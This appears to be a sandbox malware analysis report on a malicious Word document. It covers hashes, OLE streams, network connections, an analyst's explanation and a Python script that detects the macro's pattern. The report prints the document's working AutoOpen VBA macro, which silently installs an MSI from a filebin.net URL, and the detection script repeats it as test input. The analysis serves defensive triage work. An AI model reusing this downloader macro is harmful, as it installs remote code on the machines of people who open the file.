                                                                  Encrypted:false
                                                                  SSDEEP:3072:AspAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLw2loHUvU4yGxr53qM2a8:2tOdiRQYpgjpjew5LLyGx1qo8
                                                                  MD5:4CAAA03E0B59CA60A3D34674B732B702
                                                                  SHA1:EE80C8F4684055AC8960B9720FB108BE07E1D10C
                                                                  SHA-256:D01AF2B8C692DFFB04A5A04E3CCD0D0A3B2C67C8FC45A4B68C0A065B4E64CC3D
                                                                  SHA-512:25888848871286BDD1F9C43A0FBA35640EDB5BAFBE0C6AA2F9708A070EA4E5B16745B7C4F744AE4F5643F75EF47F196D430BF70921ED27715F712825EC590A34
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......`...........!.....h..........K....................................................@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\expand.exe
                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):969
                                                                  Entropy (8bit):4.307877893758803
                                                                  Encrypted:false
                                                                  SSDEEP:24:a+m2H6Kb2Y76Kb2H6Kb2Y76Kb2Y6m2+m2H6Kb2Y76Kb2Y6r:ck6Kb96Kbk6Kb96Kbb4k6Kb96KbA
                                                                  MD5:B193C14C2275982386C9C24BE523ED52
                                                                  SHA1:DFAABC4AC43E7A77882BADE797F5415C6494CF3A
                                                                  SHA-256:0A685AF3940988A82CE8310FFE0166E9488CF0A20B1A8D4028362E4B305C73C3
                                                                  SHA-512:606C8EF4FE9AFF788D76B1457D3A309010A0AB6426F27F92658AC44C717EF0D05B8CAE8D20F11F1348178633A0492513D1A9CE4765C3291681D833EA4C1F8BFE
                                                                  Malicious:false
                                                                  Preview:.2022-04-20 09:19:26, Info DPX Started DPX phase: Resume and Download Job..2022-04-20 09:19:26, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Ended DPX phase: Resume and Download Job..2022-04-20 09:19:26, Info DPX Started DPX phase: Resume and Download Job..2022-04-20 09:19:26, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Ended DPX phase: Resume and Download Job..
                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 20 03:06:00 2022, Last Saved Time/Date: Wed Apr 20 03:06:00 2022, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
                                                                  Entropy (8bit):6.071377383201628
                                                                  TrID:
                                                                  • Microsoft Word document (32009/1) 54.23%
                                                                  • Microsoft Word document (old ver.) (19008/1) 32.20%
                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                                                  File name:12543_0008858249_FWDOUTSTANDING_20200604.doc
                                                                  File size:61952
                                                                  MD5:090e1dfdcbf2185788ea14cd113cc39f
                                                                  SHA1:6346e143368edbb5a23c8eea9698be2c266311b3
                                                                  SHA256:3bd5892cdc82dc4576eaf2735edb57182ae8b91c8067be305d4e801197d390cc
                                                                  SHA512:d4c9b997909b7bfa87090204a4a97179e61c98c10be73000ec68e32af8feddee19ca8c2bc0e9bf9e3cf040d6e0f4f58f2e0f09eef2936528d1f34c506dbb2e98
                                                                  SSDEEP:768:cAuIiy1a9Tq1aBs8jCjuHF7Y89AOEUYqyxrINSrCqxw+tCc27I/:cAFMm1aidiFk89ABrbr1xrt/2
                                                                  TLSH:65535CDDF2C2C4BBE12942B5E983C7A6B3BC3E292D1293172574371F3C75924C661269
                                                                  File Content Preview:........................>.......................h...........k...............g..................................................................................................................................................................................
                                                                  Icon Hash:e4eea2aaa4b4b4a4
                                                                  Document Type:OLE
                                                                  Number of OLE Files:1
                                                                  Has Summary Info:
                                                                  Application Name:Microsoft Office Word
                                                                  Encrypted Document:False
                                                                  Contains Word Document Stream:True
                                                                  Contains Workbook/Book Stream:False
                                                                  Contains PowerPoint Document Stream:False
                                                                  Contains Visio Document Stream:False
                                                                  Contains ObjectPool Stream:False
                                                                  Flash Objects Count:0
                                                                  Contains VBA Macros:True
                                                                  Code Page:1252
                                                                  Title:
                                                                  Subject:
                                                                  Author:
                                                                  Keywords:
                                                                  Comments:
                                                                  Template:Normal.dotm
                                                                  Last Saved By:
Revision Number:1
                                                                  Total Edit Time:0
                                                                  Create Time:2022-04-20 02:06:00
                                                                  Last Saved Time:2022-04-20 02:06:00
                                                                  Number of Pages:1
                                                                  Number of Words:0
                                                                  Number of Characters:1
                                                                  Creating Application:Microsoft Office Word
                                                                  Security:0
                                                                  Document Code Page:1252
                                                                  Number of Lines:1
                                                                  Number of Paragraphs:1
                                                                  Thumbnail Scaling Desired:False
                                                                  Contains Dirty Links:False
                                                                  Shared Document:False
                                                                  Changed Hyperlinks:False
                                                                  Application Version:1048576
                                                                  General
                                                                  Stream Path:Macros/VBA/ThisDocument
                                                                  VBA File Name:ThisDocument.cls
                                                                  Stream Size:1773
                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . k . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  Data Raw:01 16 03 00 00 f0 00 00 00 1c 03 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 23 03 00 00 0b 05 00 00 00 00 00 00 01 00 00 00 bf 6b 0f 39 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Attribute VB_Name = "ThisDocument"
                                                                  Attribute VB_Base = "1Normal.ThisDocument"
                                                                  Attribute VB_GlobalNameSpace = False
                                                                  Attribute VB_Creatable = False
                                                                  Attribute VB_PredeclaredId = True
                                                                  Attribute VB_Exposed = True
                                                                  Attribute VB_TemplateDerived = True
                                                                  Attribute VB_Customizable = True
                                                                  Sub AutoOpen()
                                                                  On Error Resume Next
                                                                  Dim msi As Object
                                                                  Set msi = CreateObject("WindowsInstaller.Installer")
                                                                  msi.UILevel = 2
                                                                  ' the second Property param may require some troubleshooting / testing https://docs.microsoft.com/en-us/windows/win32/msi/action
                                                                  msi.InstallProduct "https://filebin.net/rf43v6qzghbj7h7b/TRY.msi", ""
                                                                  End Sub
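Analyst note on the ThisDocument macro above: AutoOpen runs as soon as the document is opened with macros enabled, CreateObject("WindowsInstaller.Installer") instantiates the Windows Installer COM automation object, UILevel = 2 (msiUILevelNone) suppresses every installer dialog, and InstallProduct hands the remote URL straight to the Windows Installer service. That is why msiexec.exe appears as the process dropping the PE32 DLL listed earlier in this report, and why the TLS connections in the network table below start within seconds of the document being opened. The following stdlib-only Python script is an added triage example; it is not part of the Joe Sandbox report or of the sample. It scans VBA source text (for instance the output of oletools' olevba, which is assumed to have already extracted the macro from the OLE streams) for this auto-run plus WindowsInstaller.Installer plus remote-package pattern and pulls out the package URL and host. The constructed inputs are a copy of the macro above and a benign AutoOpen macro; the regular expressions, the Finding structure and the function names are this example's own.

```python
"""Added triage example, not part of the Joe Sandbox report or the sample.

Flags the 'WindowsInstaller.Installer -> InstallProduct(<remote URL>)'
downloader pattern in VBA source text and extracts the indicators an analyst
wants (auto-exec trigger, UI level, package URL, host).  Input is VBA source
as text, e.g. what oletools' olevba prints; decompressing the VBA streams
out of the OLE file is left to such a tool.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import urlparse

# Procedures Word/Excel run on their own once macros are enabled.
AUTOEXEC = re.compile(
    r"\bSub\s+(AutoOpen|AutoExec|AutoClose|AutoExit|AutoNew|Document_Open|"
    r"Document_Close|Document_New|Workbook_Open|Workbook_Close)\s*\(",
    re.IGNORECASE,
)
INSTALLER_OBJ = re.compile(
    r'CreateObject\s*\(\s*"WindowsInstaller\.Installer"\s*\)', re.IGNORECASE)
UILEVEL = re.compile(r"\.UILevel\s*=\s*(\d+)", re.IGNORECASE)
INSTALL_PRODUCT = re.compile(
    r'\.InstallProduct\s+"([^"]+)"(?:\s*,\s*"([^"]*)")?', re.IGNORECASE)
# Installer.UILevel values (msiUILevel* enumeration); 2 means no UI at all.
MSI_UI_LEVELS = {0: "NoChange", 1: "Default", 2: "None (silent)",
                 3: "Basic", 4: "Reduced", 5: "Full"}


@dataclass
class Finding:
    autoexec: List[str] = field(default_factory=list)
    installer_object: bool = False
    ui_level: Optional[int] = None
    packages: List[str] = field(default_factory=list)         # every InstallProduct target
    remote_packages: List[str] = field(default_factory=list)  # http(s) targets only
    hosts: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # auto-run + Windows Installer COM object + package fetched over http(s)
        return bool(self.autoexec) and self.installer_object and bool(self.remote_packages)

    @property
    def ui_level_name(self) -> str:
        if self.ui_level is None:
            return "not set"
        return MSI_UI_LEVELS.get(self.ui_level, "unknown")


def strip_comment(line: str) -> str:
    """Remove a trailing ' comment unless the quote sits inside a string literal,
    so a URL that only appears in a comment is not reported as an indicator."""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return line[:i]
    return line


def scan_vba(vba: str) -> Finding:
    code = "\n".join(strip_comment(line) for line in vba.splitlines())
    f = Finding()
    f.autoexec = [m.group(1) for m in AUTOEXEC.finditer(code)]
    f.installer_object = INSTALLER_OBJ.search(code) is not None
    m = UILEVEL.search(code)
    if m:
        f.ui_level = int(m.group(1))
    for m in INSTALL_PRODUCT.finditer(code):
        pkg = m.group(1)
        f.packages.append(pkg)
        u = urlparse(pkg)
        if u.scheme.lower() in ("http", "https") and u.hostname:
            f.remote_packages.append(pkg)
            f.hosts.append(u.hostname)
    return f


# Constructed test input: the ThisDocument macro reproduced from the report above.
SAMPLE_MACRO = '''Sub AutoOpen()
On Error Resume Next
Dim msi As Object
Set msi = CreateObject("WindowsInstaller.Installer")
msi.UILevel = 2
' the second Property param may require some troubleshooting / testing https://docs.microsoft.com/en-us/windows/win32/msi/action
msi.InstallProduct "https://filebin.net/rf43v6qzghbj7h7b/TRY.msi", ""
End Sub
'''

# Constructed benign macro: auto-runs but never touches an installer object.
BENIGN_MACRO = '''Sub AutoOpen()
ActiveDocument.Sections(1).Headers(1).Range.Text = "Internal use only"
End Sub
'''

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        f = scan_vba(src)
        print(f"{name}: suspicious={f.suspicious} autoexec={f.autoexec} "
              f"UILevel={f.ui_level} ({f.ui_level_name}) hosts={f.hosts}")
```

Run it directly to get one verdict line per input. The comment stripper keeps the docs.microsoft.com link in the macro's comment out of the indicator list, and UILevel is reported but not required for the verdict, since a noisy install is still an install; the host list is what goes into blocking and the network table below is where it should be matched against resolved addresses.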

                                                                  General
                                                                  Stream Path:\x1CompObj
                                                                  File Type:data
                                                                  Stream Size:114
                                                                  Entropy:4.2359563651
                                                                  Base64 Encoded:True
                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  General
                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                  File Type:data
                                                                  Stream Size:4096
                                                                  Entropy:0.229954151382
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
                                                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d4 00 00 00 0b 00 00 00 01 00 00 00 60 00 00 00 05 00 00 00 68 00 00 00 06 00 00 00 70 00 00 00 11 00 00 00 78 00 00 00 17 00 00 00 80 00 00 00 0b 00 00 00 88 00 00 00 10 00 00 00 90 00 00 00 13 00 00 00 98 00 00 00 16 00 00 00 a0 00 00 00
                                                                  General
                                                                  Stream Path:\x5SummaryInformation
                                                                  File Type:data
                                                                  Stream Size:4096
                                                                  Entropy:0.414636097734
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 8 . . . . . . . D . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 64 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 bc 00 00 00 06 00 00 00 c8 00 00 00 07 00 00 00 d4 00 00 00 08 00 00 00 e8 00 00 00 09 00 00 00 f4 00 00 00
                                                                  General
                                                                  Stream Path:1Table
                                                                  File Type:data
                                                                  Stream Size:7133
                                                                  Entropy:5.86601132644
                                                                  Base64 Encoded:True
                                                                  Data ASCII:. . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                                  Data Raw:1e 06 0f 00 12 00 01 00 78 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                  General
                                                                  Stream Path:Data
                                                                  File Type:data
                                                                  Stream Size:32978
                                                                  Entropy:7.70790581307
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . D . d . . . . . . . . . . . . . . . . . . . . . . . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . C . . . " . . . . A . . . . . . . . . . . . . . . . . . . . . . t . h . a . i . . . . . . . . . . . . . . . b . . . 8 . . . . . . d . . A . . . a , . . m S . ? . . . . . . . . . . D . . . . . . . . n . . . . . . . d . . A . . . a , . . m S . ? . . P N G . . . . . . . . I H D R . . . . . . . . . . . . . . . . . . . . . s R G B
                                                                  Data Raw:d2 80 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 96 19 47 0e e8 03 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 46 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 22 00 00 00 04 41 01 00 00 00 05 c1 0a 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 74 00 68 00
                                                                  General
                                                                  Stream Path:Macros/PROJECT
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Stream Size:367
                                                                  Entropy:5.30381145663
                                                                  Base64 Encoded:True
                                                                  Data ASCII:I D = " { 0 6 2 5 E 4 4 A - E 7 6 5 - 4 1 C E - 9 D F D - C 3 4 7 3 6 B 7 5 A 4 6 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 3 C 1 2 6 B 2 3 E B 6 3 E B 6 3 E B 6 3 E B 6 " . . D P B = " D 7 D 5 3 2 A E 5 2 D 6 6 7 D 7 6 7 D 7 6 7 " . . G C = " E B E 9 0 E D A 2 3 D B 2 3 D B D C " . . . . [ H o s t E x t e n d e r I n f o ]
                                                                  Data Raw:49 44 3d 22 7b 30 36 32 35 45 34 34 41 2d 45 37 36 35 2d 34 31 43 45 2d 39 44 46 44 2d 43 33 34 37 33 36 42 37 35 41 34 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
                                                                  General
                                                                  Stream Path:Macros/PROJECTwm
                                                                  File Type:data
                                                                  Stream Size:41
                                                                  Entropy:3.07738448508
                                                                  Base64 Encoded:False
                                                                  Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                                                                  Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                                                                  General
                                                                  Stream Path:Macros/VBA/_VBA_PROJECT
                                                                  File Type:data
                                                                  Stream Size:2435
                                                                  Entropy:3.97570851109
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                  Data Raw:cc 61 b5 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                  General
                                                                  Stream Path:Macros/VBA/dir
                                                                  File Type:data
                                                                  Stream Size:513
                                                                  Entropy:6.23760719085
                                                                  Base64 Encoded:True
                                                                  Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . u a \\ d . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . r . m . .
                                                                  Data Raw:01 fd b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 75 61 5c 64 0b 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                                                                  General
                                                                  Stream Path:WordDocument
                                                                  File Type:data
                                                                  Stream Size:4096
                                                                  Entropy:1.08065186697
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j D . D . . . . . . . . . . . . . . . . . . . . . . . . . . . & v S h & v S h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  Data Raw:ec a5 c1 00 2d 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a 44 1c 44 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 26 76 53 68 26 76 53 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 20, 2022 09:18:54.811676979 CEST | 49173 | 443 | 192.168.2.22 | 185.47.40.36
Apr 20, 2022 09:18:54.811722994 CEST | 443 | 49173 | 185.47.40.36 | 192.168.2.22
Apr 20, 2022 09:18:54.811779022 CEST | 49173 | 443 | 192.168.2.22 | 185.47.40.36
Apr 20, 2022 09:18:54.816365957 CEST | 49173 | 443 | 192.168.2.22 | 185.47.40.36
Apr 20, 2022 09:18:54.816391945 CEST | 443 | 49173 | 185.47.40.36 | 192.168.2.22
Apr 20, 2022 09:18:54.923983097 CEST | 443 | 49173 | 185.47.40.36 | 192.168.2.22
Apr 20, 2022 09:18:54.924114943 CEST | 49173 | 443 | 192.168.2.22 | 185.47.40.36
Apr 20, 2022 09:18:54.933249950 CEST | 49173 | 443 | 192.168.2.22 | 185.47.40.36
Apr 20, 2022 09:18:54.933269024 CEST | 443 | 49173 | 185.47.40.36 | 192.168.2.22
Apr 20, 2022 09:18:54.933573008 CEST | 443 | 49173 | 185.47.40.36 | 192.168.2.22
Apr 20, 2022 09:18:55.139383078 CEST | 49173 | 443 | 192.168.2.22 | 185.47.40.36
Apr 20, 2022 09:18:55.278825998 CEST | 49173 | 443 | 192.168.2.22 | 185.47.40.36
Apr 20, 2022 09:18:55.322189093 CEST | 443 | 49173 | 185.47.40.36 | 192.168.2.22
Apr 20, 2022 09:18:55.339699984 CEST | 443 | 49173 | 185.47.40.36 | 192.168.2.22
Apr 20, 2022 09:18:55.339776993 CEST | 443 | 49173 | 185.47.40.36 | 192.168.2.22
Apr 20, 2022 09:18:55.339869022 CEST | 49173 | 443 | 192.168.2.22 | 185.47.40.36
Apr 20, 2022 09:18:55.354721069 CEST | 49173 | 443 | 192.168.2.22 | 185.47.40.36
Apr 20, 2022 09:18:55.354753017 CEST | 443 | 49173 | 185.47.40.36 | 192.168.2.22
Apr 20, 2022 09:18:55.506489992 CEST | 49174 | 443 | 192.168.2.22 | 87.238.33.8
Apr 20, 2022 09:18:55.506531000 CEST | 443 | 49174 | 87.238.33.8 | 192.168.2.22
Apr 20, 2022 09:18:55.506872892 CEST | 49174 | 443 | 192.168.2.22 | 87.238.33.8
Apr 20, 2022 09:18:55.507960081 CEST | 49174 | 443 | 192.168.2.22 | 87.238.33.8
Apr 20, 2022 09:18:55.507970095 CEST | 443 | 49174 | 87.238.33.8 | 192.168.2.22
Apr 20, 2022 09:18:55.731769085 CEST | 443 | 49174 | 87.238.33.8 | 192.168.2.22
Apr 20, 2022 09:18:55.731873989 CEST | 49174 | 443 | 192.168.2.22 | 87.238.33.8
Apr 20, 2022 09:18:55.740710974 CEST | 49174 | 443 | 192.168.2.22 | 87.238.33.8
Apr 20, 2022 09:18:55.740725040 CEST | 443 | 49174 | 87.238.33.8 | 192.168.2.22
Apr 20, 2022 09:18:55.741158962 CEST | 443 | 49174 | 87.238.33.8 | 192.168.2.22
Apr 20, 2022 09:18:55.756040096 CEST | 49174 | 443 | 192.168.2.22 | 87.238.33.8
Apr 20, 2022 09:18:55.798182964 CEST | 443 | 49174 | 87.238.33.8 | 192.168.2.22
Apr 20, 2022 09:18:55.807862997 CEST | 443 | 49174 | 87.238.33.8 | 192.168.2.22
Apr 20, 2022 09:18:55.853785038 CEST | 443 | 49174 | 87.238.33.8 | 192.168.2.22
Apr 20, 2022 09:18:55.853846073 CEST | 443 | 49174 | 87.238.33.8 | 192.168.2.22
Apr 20, 2022 09:18:55.853986979 CEST | 49174 | 443 | 192.168.2.22 | 87.238.33.8
Apr 20, 2022 09:18:55.854008913 CEST | 443 | 49174 | 87.238.33.8 | 192.168.2.22
Apr 20, 2022 09:18:55.854023933 CEST | 443 | 49174 | 87.238.33.8 | 192.168.2.22
Apr 20, 2022 09:18:55.854063034 CEST | 443 | 49174 | 87.238.33.8 | 192.168.2.22
Apr 20, 2022 09:18:55.854067087 CEST | 49174 | 443 | 192.168.2.22 | 87.238.33.8
Apr 20, 2022 09:18:55.854093075 CEST | 443 | 49174 | 87.238.33.8 | 192.168.2.22
Apr 20, 2022 09:18:55.854103088 CEST | 49174 | 443 | 192.168.2.22 | 87.238.33.8
Apr 20, 2022 09:18:55.854110003 CEST | 443 | 49174 | 87.238.33.8 | 192.168.2.22
Apr 20, 2022 09:18:55.854116917 CEST | 49174 | 443 | 192.168.2.22 | 87.238.33.8
Apr 20, 2022 09:18:55.854135990 CEST | 49174 | 443 | 192.168.2.22 | 87.238.33.8
Apr 20, 2022 09:18:55.854147911 CEST | 49174 | 443 | 192.168.2.22 | 87.238.33.8
Apr 20, 2022 09:18:55.854275942 CEST | 49174 | 443 | 192.168.2.22 | 87.238.33.8
Apr 20, 2022 09:18:55.854629040 CEST | 49174 | 443 | 192.168.2.22 | 87.238.33.8
Apr 20, 2022 09:18:55.899869919 CEST | 443 | 49174 | 87.238.33.8 | 192.168.2.22
Apr 20, 2022 09:18:55.899888992 CEST | 443 | 49174 | 87.238.33.8 | 192.168.2.22
Apr 20, 2022 09:18:55.899919987 CEST | 443 | 49174 | 87.238.33.8 | 192.168.2.22
Apr 20, 2022 09:18:55.899954081 CEST | 49174 | 443 | 192.168.2.22 | 87.238.33.8
                                                                  Apr 20, 2022 09:18:55.899966002 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.899982929 CEST49174443192.168.2.2287.238.33.8
